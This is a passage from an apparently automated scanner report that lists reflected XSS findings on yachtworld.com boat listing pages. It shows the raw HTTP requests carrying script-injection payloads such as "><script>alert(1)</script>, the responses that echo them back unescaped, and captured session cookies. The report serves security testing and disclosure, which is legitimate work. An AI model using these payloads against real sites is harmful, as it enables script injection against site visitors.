Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2292192&boat_id=2292192&back=/core/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJe8505"><script>alert(1)</script>a3117596587/United-States&boat_id=2292192">
...[SNIP]...

3.119. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b11"><script>alert(1)</script>de0f00ef8b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States65b11"><script>alert(1)</script>de0f00ef8b8 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:10 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sun, 05 Dec 2010 20:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:10 GMT
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
f="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2292192&boat_id=2292192&back=/core/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States65b11"><script>alert(1)</script>de0f00ef8b8&boat_id=2292192">
...[SNIP]...

3.120. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 942a4"><script>alert(1)</script>8ccc840a7ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States?942a4"><script>alert(1)</script>8ccc840a7ad=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:13 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sun, 05 Dec 2010 20:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:13 GMT
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2292192&942a4"><script>alert(1)</script>8ccc840a7ad=1&boat_id=2292192&back=/core/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States&boat_id=2292192">
...[SNIP]...

3.121. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d94e"><script>alert(1)</script>a896240f5f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-1787065/Hilton-Head3d94e"><script>alert(1)</script>a896240f5f2/SC/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL